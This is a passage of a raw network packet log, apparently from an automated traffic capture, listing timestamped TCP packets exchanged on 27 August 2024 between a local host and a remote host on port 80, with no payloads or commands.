                                Aug 27, 2024 09:49:36.239953041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239953041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.239964962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.239979982 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240017891 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240170956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240186930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240200996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240211964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240223885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240226030 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240242958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240257025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240268946 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240279913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240291119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240303993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240335941 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240503073 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240514994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240525007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240536928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240550041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240557909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240570068 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240571022 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240582943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240596056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240597010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240607023 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240623951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240650892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240744114 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240756035 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240767956 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240778923 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240793943 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240816116 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240876913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240888119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240897894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240911007 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240917921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240922928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.240943909 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.240967989 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241110086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241121054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241132021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241143942 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241156101 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241167068 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241172075 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241178036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241189003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241195917 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241202116 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241214037 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241216898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241225958 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241235018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241249084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241763115 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241772890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241785049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241868019 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241879940 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241892099 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241903067 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.241904974 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241918087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.241945028 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242347002 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242391109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242402077 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242422104 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242443085 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242503881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242515087 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242526054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242537975 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242549896 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242562056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242599010 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242621899 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242777109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242789030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242800951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242813110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242825985 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.242841005 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.242867947 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.243026018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.243160963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325033903 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325058937 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325069904 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325086117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325171947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325182915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325193882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325205088 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325205088 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325239897 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325259924 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325408936 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325448036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325459003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325486898 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325525999 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325540066 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325565100 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325581074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325594902 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325658083 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325712919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325782061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325786114 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325794935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325891018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325906992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325918913 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325931072 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.325958014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.325994968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326035976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326069117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326080084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326117992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326154947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326165915 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326176882 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326189041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326200962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326211929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326214075 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326225996 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326272964 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326281071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326297998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326311111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326342106 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326527119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326538086 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326553106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326559067 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326564074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326569080 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326633930 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326644897 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326657057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326668978 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326680899 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326692104 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326766014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326808929 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326814890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326827049 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326838970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326850891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326863050 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326864004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326878071 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326889992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326890945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326925993 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326939106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.326941013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326941013 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.326948881 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327065945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327104092 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327116966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327126980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327137947 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327150106 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327157021 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327161074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327172995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327178955 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327183962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327195883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327205896 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327218056 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327243090 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327419996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327430964 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327436924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327442884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327452898 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327459097 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327470064 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327480078 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327492952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327506065 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327567101 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327596903 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327625036 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327636957 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327647924 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327682018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327682018 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327697992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327708960 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327722073 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327723980 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327733994 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.327749014 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.327774048 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328062057 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328073025 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328083992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328111887 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328123093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328128099 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328135014 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328155041 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328161001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328172922 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328178883 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328255892 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328327894 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328339100 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328345060 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328363895 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328377008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328392029 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328402996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328439951 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328468084 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328680038 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328732967 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328744888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328747034 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328789949 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328799963 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328803062 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328861952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328874111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.328897953 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.328910112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329360008 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329507113 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329516888 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329534054 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329545021 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329547882 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329555988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329567909 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329586983 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329597950 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329610109 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329619884 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329628944 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329639912 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329651117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329658031 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329669952 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329679966 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329682112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329690933 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.329716921 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.329740047 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.413403988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413423061 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413448095 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413460970 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413472891 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413486004 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413499117 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413511992 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413589001 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413625956 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.413642883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413655043 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413670063 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413682938 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413718939 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413731098 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.413918018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.413918018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.413918018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.413918018 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414041996 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414093971 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414097071 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414107084 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414144993 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414194107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414275885 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414288044 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414300919 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414318085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414319992 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414338112 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414340973 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414350986 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414381981 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414382935 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414395094 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414431095 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414516926 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414529085 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414541006 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414554119 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414570093 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414571047 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414580107 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414606094 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414648056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414664030 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414675951 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414688110 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414714098 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414729118 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414859056 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414870977 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.414902925 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.414974928 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415080070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415124893 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415177107 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415189028 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415199995 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415220976 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415293932 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415306091 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415335894 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415426016 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415438890 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415452003 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415466070 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415478945 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415482998 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415496111 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415504932 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415532112 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415559053 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415574074 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415585041 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415596962 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415608883 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415652990 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415673971 CEST4971580192.168.2.8188.114.96.3
                                Aug 27, 2024 09:49:36.415764093 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415776968 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415791988 CEST8049715188.114.96.3192.168.2.8
                                Aug 27, 2024 09:49:36.415803909 CEST8049715188.114.96.3192.168.2.8
